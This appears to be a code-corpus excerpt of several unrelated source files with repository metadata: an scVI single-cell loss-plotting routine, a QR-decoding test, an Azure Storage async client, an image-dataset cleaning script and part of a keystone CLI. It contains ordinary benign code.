)
elif reconstruction_loss == "zinb":
reconst_loss = log_zinb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
gene_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=0)
cell_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=1)
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))[0]
if not gene_mean.shape:
# TODO: need to handle this more gracefully
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))
cell_mean = np.array(adata[:, scviDataset.gene_names].X.mean(1)).flatten()
fig1 = plt.figure(figsize=figsize)
ax = fig1.add_subplot(121)
ax.scatter(
gene_mean, gene_loss, label="Gene", alpha=0.5, color="black", s=point_size
)
gene_loss_df = pd.DataFrame([gene_mean, gene_loss])
gene_loss_df = gene_loss_df.T
gene_loss_df.index = list(scviDataset.gene_names)
gene_loss_df.columns = ["gene_mean", "gene_loss"]
cell_loss_df = pd.DataFrame([cell_mean, cell_loss])
cell_loss_df = cell_loss_df.T
cell_loss_df.index = list(adata.obs_names)
cell_loss_df.columns = ["cell_mean", "cell_loss"]
if outdir:
gene_loss_df.to_csv(
os.path.join(outdir, "SCVI_geneloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
cell_loss_df.to_csv(
os.path.join(outdir, "SCVI_cellloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig1.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
legend_fontweight=legend_fontweight,
ax=ax,
size=point_size,
legend_loc=legend_loc,
)
title = "{} | Genewise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig1.suptitle(title)
fig1.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
os.makedirs(outdir, exist_ok=True)
fig1.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig1.savefig(os.path.join(outdir, "{}.png".format(title)))
fig2 = plt.figure(figsize=figsize)
ax = fig2.add_subplot(121)
ax.scatter(cell_mean, cell_loss, label="Cell", alpha=0.5, s=point_size)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig2.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_loc=legend_loc,
legend_fontweight=legend_fontweight,
size=point_size,
)
title = "{} | Cellwise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig2.suptitle(title)
fig2.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig2.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig2.savefig(os.path.join(outdir, "{}.png".format(title)))
if outdir:
model_name = "{} | Posterior | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
# scVI explicitly asks this path to be empty
shutil.rmtree(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior"),
ignore_errors=True,
)
scvi_posterior.save_posterior(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior")
)
if sct_cell_pars is None:
fig1.show()
fig2.show()
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
None,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
return dict(zip(titles_to_return, obj_to_return))
title = "{} | Libsize | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
library_sizes = pd.DataFrame(scvi_posterior.get_stats())
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
library_sizes.index = adata.obs_names
library_sizes.columns = ["scvi_libsize"]
library_sizes["scvi_loglibsize"] = np.log10(library_sizes["scvi_libsize"])
library_size_df = library_sizes.join(sct_library_sizes)
fig3 = plt.figure(figsize=(10, 5))
ax = fig3.add_subplot(121)
ax.scatter(
library_size_df["log_umi"],
library_size_df["scvi_libsize"],
alpha=0.5,
s=point_size,
)
ax.set_xlabel("log_umi")
ax.set_ylabel("scvi_libsize")
ax = fig3.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig3.suptitle(title)
fig3.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig3.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig3.savefig(os.path.join(outdir, "{}.png".format(title)))
fig1.show()
fig2.show()
fig3.show()
means_df = []
dropout_df = []
dispersion_df = []
for tensors in scvi_posterior.sequential(batch_size=batch_size):
sample_batch, _, _, batch_index, labels = tensors
outputs = scvi_posterior.model.inference(
sample_batch, batch_index=batch_index, y=labels
)
px_r = outputs["px_r"].detach().cpu().numpy()
px_rate = outputs["px_rate"].detach().cpu().numpy()
px_dropout = outputs["px_dropout"].detach().cpu().numpy()
dropout_df.append(px_dropout)
dispersion_df.append(px_r)
means_df.append(px_rate)
dropout_df = pd.DataFrame(np.vstack(dropout_df))
dispersion_df = pd.DataFrame(np.vstack(dispersion_df))
means_df = pd.DataFrame(np.vstack(means_df))
means_df.index = list(adata.obs_names)
means_df.columns = list(scviDataset.gene_names)
means_df = means_df.T
dropout_df.index = list(adata.obs_names)
dropout_df.columns = list(scviDataset.gene_names)
dropout_df = dropout_df.T
dispersion_df.index = list(adata.obs_names)
dispersion_df.columns = list(scviDataset.gene_names)
dispersion_df = dispersion_df.T
reconst_loss_df = pd.DataFrame(reconst_loss.detach().cpu().numpy())
reconst_loss_df.index = list(adata.obs_names)
reconst_loss_df.columns = list(scviDataset.gene_names)
reconst_loss_df = reconst_loss_df.T
if outdir:
os.makedirs(outdir, exist_ok=True)
means_df.to_csv(
os.path.join(outdir, "SCVI_means_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dropout_df.to_csv(
os.path.join(outdir, "SCVI_dropout_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dispersion_df.to_csv(
os.path.join(outdir, "SCVI_dispersions_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
reconst_loss_df.to_csv(
os.path.join(outdir, "SCVI_reconstloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
fig3,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
gene_cell_disp_summary_df = pd.DataFrame(
dispersion_df.median(1), columns=["gene_cell_mean_disp"]
)
merged_df = sct_gene_pars_df.join(gene_cell_disp_summary_df).dropna()
fig = plt.figure(figsize=(8, 4))
ax = fig.add_subplot(121)
ax.scatter(
merged_df["gmean"], merged_df["gene_cell_mean_disp"], alpha=0.5, label="Gene"
)
ax.legend(frameon=False)
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCVI theta")
merged_df = sct_gene_pars_df.join(sct_model_pars_fit_df)
ax = fig.add_subplot(122)
ax.scatter(merged_df["gmean"], merged_df["theta"], alpha=0.5, label="Gene")
ax.legend(frameon=False) # , loc='upper left')
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCT theta")
title = "{} | ThetaVSGmean | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig.suptitle(title)
fig.tight_layout()
title = title.replace(" ", "")
if outdir:
fig.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig.savefig(os.path.join(outdir, "{}.png".format(title)))
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
mean_scvi_disp_df = pd.DataFrame(dispersion_df.mean(1), columns=["scvi_dispersion"])
sct_disp_df = pd.read_csv(
sct_cell_pars.replace("_cell_", "_model_"), sep="\t", index_col=0
)
joined_df = sct_disp_df.join(mean_scvi_disp_df)
title = "{} | Dispersion | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig4 = plt.figure(figsize=(10, 5))
ax = fig4.add_subplot(121)
ax.scatter(joined_df["theta"], joined_df["scvi_dispersion"], alpha=0.5)
ax.axline([0, 0], [1, 1], color="gray", linestyle="dashed")
ax.set_xlabel("SCT theta")
ax.set_ylabel("scVI theta")
ax = fig4.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig4.suptitle(title)
fig4.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig4.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig4.savefig(os.path.join(outdir, "{}.png".format(title)))
return dict(zip(titles_to_return, obj_to_return))
def RunSCVI(
counts_dir,
metadata_file,
sct_cell_pars,
outdir,
title_prefix="",
idents_col="phenoid",
reconstruction_loss="nb",
dispersion="gene-cell",
cell_offset="none",
gene_offset="none",
n_encoder=1,
hvg_genes=3000,
ldvae=False,
ldvae_bias=False,
use_cuda=True,
genes_to_exclude_file=None,
lr=1e-3,
kl_type="reverse",
**kwargs,
):
adata = sc.read_10x_mtx(counts_dir)
metadata = pd.read_csv(metadata_file, sep="\t", index_col=0)
adata.obs["named_clusters"] = metadata[idents_col]
n_epochs = np.min([round((20000 / adata.n_obs) * 400), 400])
sct_model_pars_fit = sct_cell_pars.replace("cell_pars", "model_pars_fit")
sct_gene_pars = sct_cell_pars.replace("cell_pars", "gene_attrs")
if genes_to_exclude_file:
genes_to_exclude_df = pd.read_csv(genes_to_exclude_file, sep="\t", index_col=0)
genes_to_exclude = genes_to_exclude_df.index.tolist()
all_genes = adata.var_names
genes_to_keep = list(set(all_genes).difference(genes_to_exclude))
adata = adata[:, genes_to_keep]
results = RunVAE(
adata,
reconstruction_loss,
linear=ldvae,
title_prefix=title_prefix,
n_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
hvg_genes=hvg_genes,
n_epochs=n_epochs,
lr=lr,
dispersion=dispersion,
use_cuda=use_cuda,
sct_cell_pars=sct_cell_pars,
sct_gene_pars=sct_gene_pars,
sct_model_pars_fit=sct_model_pars_fit,
outdir=outdir,
kl_type=kl_type,
**kwargs,
)
return results
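# Example invocation (sketch only; the paths below are hypothetical placeholders
# and the remaining keyword arguments keep the defaults above):
# results = RunSCVI(
#     counts_dir="data/filtered_feature_bc_matrix",
#     metadata_file="data/metadata.tsv",
#     sct_cell_pars="data/sct_cell_pars.tsv",
#     outdir="results/scvi_run",
# )
# results["latent"]  # latent embedding; figures are under the *_plot keys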
|
[
"saketkc@gmail.com"
] |
saketkc@gmail.com
|
448a496d6cf183fe73cf62e90b39b8f5e925a6f8
|
cc1d44cf04e5b2b15bb296a434aad4ae4bcfc4be
|
/python3/qr/zbarlight_test.py
|
5944e63c9ba7fb774948ce49dce2fe4de1a416f1
|
[] |
no_license
|
ericosur/ericosur-snippet
|
dda2200546b13fb9b84632d115a0f4ca5e3d5c47
|
0309eeb614612f9a35843e2f45f4080ae03eaa81
|
refs/heads/main
| 2023-08-08T04:54:05.907435
| 2023-07-25T06:04:01
| 2023-07-25T06:04:01
| 23,057,196
| 2
| 1
| null | 2022-08-31T09:55:19
| 2014-08-18T03:18:52
|
Perl
|
UTF-8
|
Python
| false
| false
| 864
|
py
|
#!/usr/bin/env python3
# coding: utf-8
'''
apt-get install libzbar-dev
pip install zbarlight
I do not recommend using this module to decode QR codes.
'''
import sys
from PIL import Image
import common
try:
import zbarlight
except ImportError:
    print('need to install zbarlight (python) and libzbar-dev')
sys.exit(1)
def read_image(fn):
''' read image '''
im = None
with open(fn, "rb") as fin:
im = Image.open(fin)
im.load()
return im
def process():
''' process '''
arr = common.get_pngs()
for fn in arr:
print('fn:', fn)
im = read_image(fn)
        codes = zbarlight.scan_codes(['qrcode'], im)
        # scan_codes returns None when nothing is decoded; guard before iterating
        if not codes:
            continue
        # codes is a list of 'bytes' objects
        for s in codes:
            print(s)
            print(s.decode('utf-8'))
def main():
''' main '''
process()
if __name__ == '__main__':
main()
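# One-off decode of a single image (sketch; 'sample.png' is a hypothetical path):
# with open('sample.png', 'rb') as fin:
#     im = Image.open(fin)
#     im.load()
# print(zbarlight.scan_codes(['qrcode'], im))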
|
[
"ericosur@gmail.com"
] |
ericosur@gmail.com
|
ee2c1cb101ed600ef6a59804bd8a60d49f33250a
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2019_06_01/aio/_storage_management_client_async.py
|
c4106bd382d3bd7e0ec92066dc1895978266f306
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 8,245
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import StorageManagementClientConfiguration
from .operations_async import Operations
from .operations_async import SkusOperations
from .operations_async import StorageAccountsOperations
from .operations_async import UsagesOperations
from .operations_async import ManagementPoliciesOperations
from .operations_async import PrivateEndpointConnectionsOperations
from .operations_async import PrivateLinkResourcesOperations
from .operations_async import ObjectReplicationPoliciesOperations
from .operations_async import EncryptionScopesOperations
from .operations_async import BlobServicesOperations
from .operations_async import BlobContainersOperations
from .operations_async import FileServicesOperations
from .operations_async import FileSharesOperations
from .operations_async import QueueServicesOperations
from .operations_async import QueueOperations
from .operations_async import TableServicesOperations
from .operations_async import TableOperations
from .. import models
class StorageManagementClient(object):
"""The Azure Storage Management API.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.storage.v2019_06_01.aio.operations_async.Operations
:ivar skus: SkusOperations operations
:vartype skus: azure.mgmt.storage.v2019_06_01.aio.operations_async.SkusOperations
:ivar storage_accounts: StorageAccountsOperations operations
:vartype storage_accounts: azure.mgmt.storage.v2019_06_01.aio.operations_async.StorageAccountsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.storage.v2019_06_01.aio.operations_async.UsagesOperations
:ivar management_policies: ManagementPoliciesOperations operations
:vartype management_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ManagementPoliciesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateEndpointConnectionsOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateLinkResourcesOperations
:ivar object_replication_policies: ObjectReplicationPoliciesOperations operations
:vartype object_replication_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ObjectReplicationPoliciesOperations
:ivar encryption_scopes: EncryptionScopesOperations operations
:vartype encryption_scopes: azure.mgmt.storage.v2019_06_01.aio.operations_async.EncryptionScopesOperations
:ivar blob_services: BlobServicesOperations operations
:vartype blob_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobServicesOperations
:ivar blob_containers: BlobContainersOperations operations
:vartype blob_containers: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobContainersOperations
:ivar file_services: FileServicesOperations operations
:vartype file_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileServicesOperations
:ivar file_shares: FileSharesOperations operations
:vartype file_shares: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileSharesOperations
:ivar queue_services: QueueServicesOperations operations
:vartype queue_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueServicesOperations
:ivar queue: QueueOperations operations
:vartype queue: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueOperations
:ivar table_services: TableServicesOperations operations
:vartype table_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableServicesOperations
:ivar table: TableOperations operations
:vartype table: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = StorageManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.skus = SkusOperations(
self._client, self._config, self._serialize, self._deserialize)
self.storage_accounts = StorageAccountsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.management_policies = ManagementPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.object_replication_policies = ObjectReplicationPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.encryption_scopes = EncryptionScopesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_services = BlobServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_containers = BlobContainersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_services = FileServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_shares = FileSharesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue_services = QueueServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue = QueueOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table_services = TableServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table = TableOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "StorageManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
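# Example usage (sketch; credential construction is an assumption here, e.g.
# azure.identity.DefaultAzureCredential, which this module does not import):
# async def print_skus(credential, subscription_id):
#     async with StorageManagementClient(credential, subscription_id) as client:
#         async for sku in client.skus.list():
#             print(sku.name)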
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
7acb737859a8d78bd545e2ef6489badd805c62d3
|
0aa3890c840528e517470207e06c1e7e136ecb43
|
/utils/__init__.py
|
524916b4a9d54c9df3eacaa805632b2aea82db06
|
[] |
no_license
|
solinari27/stockCrawler
|
7aa05cd8a7a18a6286b3bf9fd3512f4138b13951
|
4159e53cba2315b052cf37fddcbdb2dee8e9d094
|
refs/heads/master
| 2023-07-24T21:30:34.290533
| 2019-12-12T15:05:58
| 2019-12-12T15:05:58
| 120,918,787
| 0
| 0
| null | 2023-07-06T21:25:19
| 2018-02-09T14:58:31
|
Python
|
UTF-8
|
Python
| false
| false
| 119
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: solinari
@file: __init__.py
@time: 2018/11/04
"""
|
[
"solinari27@gmail.com"
] |
solinari27@gmail.com
|
45667c5a8f2316218249b7697d3dca26d9f8711e
|
ba8583b784301b2206d9cba3f57c4cc1c969165c
|
/src/data/prepare_dataset.py
|
bbf1df11477eddfd9cf35c8325d3ab688d32214b
|
[] |
no_license
|
tonylibing/tf_classification_framework
|
c8cd0c71badf6cd20a2e87711ebbe89f6f9eceba
|
e08f1b9dc7460a147a704ec099c64785663ce070
|
refs/heads/master
| 2022-04-12T16:16:52.809842
| 2020-03-07T13:26:02
| 2020-03-07T13:26:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,541
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 21 14:12:43 2018
A batch image-verification tool.
After downloading a large amount of image data, we usually find that some
images cannot be opened, which may be caused by network transmission errors.
Therefore, before using these images, run this tool to verify the image data
and move the unreadable images to a specified path.
@author: as
"""
import os
import sys
import cv2
import numpy as np
import shutil
import warnings
from PIL import Image
import tensorflow as tf
# raise the warning as an exception
warnings.filterwarnings('error')
from utils.config_utils import load_config_file, mkdir_if_nonexist
flags = tf.app.flags
flags.DEFINE_string('config_path', '', 'path of the config file')
FLAGS = flags.FLAGS
# load config file
config_path = FLAGS.config_path
config_dict = load_config_file(config_path)
sys.stdout.flush()
reshape_size = config_dict['DATASET']['IMAGE_SIZE']
src_dir = config_dict['DATASET']['DATASET_ROOT_DIR']
use_channel_normalization = config_dict['DATASET']['USE_CHANNEL_NORMALIZATION']
output_paras = config_dict['OUTPUT']
experiment_base_dir = os.path.join(output_paras['OUTPUT_SAVE_DIR'], output_paras['EXPERIMENT_NAME'])
model_save_dir = os.path.join(experiment_base_dir, 'weights')
result_save_dir = os.path.join(experiment_base_dir, 'result')
error_save_dir = os.path.join(result_save_dir, 'error_format')
mkdir_if_nonexist(model_save_dir, raise_error=False)
mkdir_if_nonexist(result_save_dir, raise_error=False)
mkdir_if_nonexist(error_save_dir, raise_error=False)
# get datast mean_var file path
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
cnt = 0
rm_cnt = 0
rgb_list = []
for root, dirs, files in os.walk(src_dir):
for file_name in files:
cnt += 1
if cnt % 1000 == 0:
print(cnt)
sys.stdout.flush()
src_file = os.path.join(root, file_name)
dst_file = os.path.join(error_save_dir, file_name)
try:
# check by PIL Image
img_pil = Image.open(src_file)
# check by opencv
img_cv = cv2.imread(src_file)
if type(img_cv) != np.ndarray:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('error when read by cv2!', file_name)
sys.stdout.flush()
continue
# check channel number
shape = img_cv.shape
if len(shape) == 3:
# this image is valid, reshape it
height, width = shape[:2]
if width > height:
height = int(height * reshape_size / width)
width = reshape_size
else:
width = int(width * reshape_size / height)
height = reshape_size
img_reshape = cv2.resize(img_cv, (width, height), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(src_file, img_reshape)
# compute channel mean value
r_mean = np.mean(img_reshape[:,:,2])
g_mean = np.mean(img_reshape[:,:,1])
b_mean = np.mean(img_reshape[:,:,0])
rgb_list.append([r_mean, g_mean, b_mean])
elif len(shape) == 2:
# change channel num to 3
img_bgr = cv2.cvtColor(img_cv, cv2.COLOR_GRAY2BGR)
#img_bgr = cv2.merge((img_cv, img_cv, img_cv))
cv2.imwrite(src_file, img_bgr)
print("change {} from gray to rgb".format(file_name))
sys.stdout.flush()
# compute channel mean value
mean_value = np.mean(img_cv)
rgb_list.append([mean_value, mean_value, mean_value])
else:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('channel number error!', file_name)
sys.stdout.flush()
except Warning:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('A warning raised!', file_name)
sys.stdout.flush()
except:
shutil.move(src_file, dst_file)
#os.remove(src_file)
rm_cnt += 1
print('Error occured!', file_name)
sys.stdout.flush()
if use_channel_normalization == 0:
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("G_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("B_mean_std:" + str(128) + ':' + str(128) + '\n')
else:
# compute dataset channel mean and std
rgb_list = np.array(rgb_list)
    # rgb_list rows were appended as [r, g, b]: column 0 is R, column 2 is B
    r_mean = np.mean(rgb_list[:,0])
    g_mean = np.mean(rgb_list[:,1])
    b_mean = np.mean(rgb_list[:,2])
    r_std = np.std(rgb_list[:,0])
    g_std = np.std(rgb_list[:,1])
    b_std = np.std(rgb_list[:,2])
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(r_mean) + ':' + str(r_std) + '\n')
writer.write("G_mean_std:" + str(g_mean) + ':' + str(g_std) + '\n')
writer.write("B_mean_std:" + str(b_mean) + ':' + str(b_std) + '\n')
print('finish')
print("error number {}".format(rm_cnt))
|
[
"anshengmath@163.com"
] |
anshengmath@163.com
|
b24e6f5f4ec62487169653f0ea11233511822384
|
84baad5eae2bd1adb53e71429b17dcb7198e27ab
|
/keystone/keystone/cli.py
|
81fb2af4b2312a5fe763f8a695af31348765835c
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/x7_dep
|
396812eb50f431ab776bc63b8fce5f10f091d221
|
9a216e6fa3abdba1f63f9d36a4947c2a27de2bb7
|
refs/heads/master
| 2022-11-21T20:06:02.235330
| 2012-11-14T15:25:39
| 2012-11-14T15:25:39
| 282,193,462
| 0
| 0
| null | 2020-07-24T10:42:38
| 2020-07-24T10:42:38
| null |
UTF-8
|
Python
| false
| false
| 4,124
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import json
import sys
import textwrap
from keystone import config
from keystone.common import utils
CONF = config.CONF
CONF.set_usage('%prog COMMAND')
class BaseApp(object):
def __init__(self, argv=None):
self.argv = argv
def run(self):
return self.main()
def missing_param(self, param):
print 'Missing parameter: %s' % param
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
def __init__(self, *args, **kw):
super(DbSync, self).__init__(*args, **kw)
def main(self):
for k in ['identity', 'catalog', 'policy', 'token']:
driver = utils.import_object(getattr(CONF, k).driver)
if hasattr(driver, 'db_sync'):
driver.db_sync()
class ImportLegacy(BaseApp):
"""Import a legacy database."""
name = 'import_legacy'
def __init__(self, *args, **kw):
super(ImportLegacy, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
migration.migrate_all()
class ExportLegacyCatalog(BaseApp):
"""Export the service catalog from a legacy database."""
name = 'export_legacy_catalog'
def __init__(self, *args, **kw):
super(ExportLegacyCatalog, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
print '\n'.join(migration.dump_catalog())
class ImportNovaAuth(BaseApp):
"""Import a dump of nova auth data into keystone."""
name = 'import_nova_auth'
def __init__(self, *args, **kw):
super(ImportNovaAuth, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import nova
if len(self.argv) < 2:
return self.missing_param('dump_file')
dump_file = self.argv[1]
dump_data = json.loads(open(dump_file).read())
nova.import_auth(dump_data)
CMDS = {'db_sync': DbSync,
'import_legacy': ImportLegacy,
'export_legacy_catalog': ExportLegacyCatalog,
'import_nova_auth': ImportNovaAuth,
}
def print_commands(cmds):
print
print 'Available commands:'
o = []
max_length = max([len(k) for k in cmds]) + 2
for k, cmd in sorted(cmds.iteritems()):
initial_indent = '%s%s: ' % (' ' * (max_length - len(k)), k)
tw = textwrap.TextWrapper(initial_indent=initial_indent,
subsequent_indent=' ' * (max_length + 2),
width=80)
o.extend(tw.wrap(
(cmd.__doc__ and cmd.__doc__ or 'no docs').strip().split('\n')[0]))
print '\n'.join(o)
def run(cmd, args):
return CMDS[cmd](argv=args).run()
def main(argv=None, config_files=None):
CONF.reset()
